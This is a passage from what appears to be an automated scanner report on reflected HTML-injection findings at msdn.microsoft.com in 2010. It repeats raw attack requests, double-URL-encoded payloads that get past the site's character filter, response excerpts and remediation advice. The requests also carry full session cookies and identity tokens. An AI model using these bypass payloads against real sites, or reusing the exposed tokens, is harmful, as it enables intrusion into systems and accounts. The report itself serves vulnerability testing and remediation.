17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9219 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:14 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582940(office.1154a8e"><a>dc8afda3d17" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18002%2522%253e%253ca%253e6324386485a was submitted in the REST URL parameter 1. This input was echoed as 18002"><a>6324386485a in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:55:53 GMT Content-Length: 9196
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us18002"><a>6324386485a/library/dd582940(office.11)" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c36af%2522%253e%253ca%253e86108dcf880 was submitted in the REST URL parameter 2. This input was echoed as c36af"><a>86108dcf880 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:56:24 GMT Content-Length: 9196
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryc36af"><a>86108dcf880/dd582940(office.11)" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93bc5%2522%253e%253ca%253e7a158e741b3 was submitted in the REST URL parameter 3. This input was echoed as 93bc5"><a>7a158e741b3 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 17:56:54 GMT Content-Length: 9206
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582940(office.11).aspx93bc5"><a>7a158e741b3" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b717%2522%253e%253ca%253e026167f029 was submitted in the REST URL parameter 1. This input was echoed as 3b717"><a>026167f029 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us3b717%2522%253e%253ca%253e026167f029/library/default(loband).aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9211 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:01 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us3b717"><a>026167f029/library/default(loband)" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a550a%2522%253e%253ca%253eae5fa62af7a was submitted in the REST URL parameter 2. This input was echoed as a550a"><a>ae5fa62af7a in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/librarya550a%2522%253e%253ca%253eae5fa62af7a/default(loband).aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9213 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:10 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/librarya550a"><a>ae5fa62af7a/default(loband)" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b270%2522%253e%253ca%253e1e436389099 was submitted in the REST URL parameter 3. This input was echoed as 8b270"><a>1e436389099 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/default(loband).aspx8b270%2522%253e%253ca%253e1e436389099 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9223 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:20 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/default(loband).aspx8b270"><a>1e436389099" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce0fb%2522%253e%253ca%253e210aa7e2390 was submitted in the REST URL parameter 1. This input was echoed as ce0fb"><a>210aa7e2390 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usce0fb%2522%253e%253ca%253e210aa7e2390/library/ee663300(VS.85 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 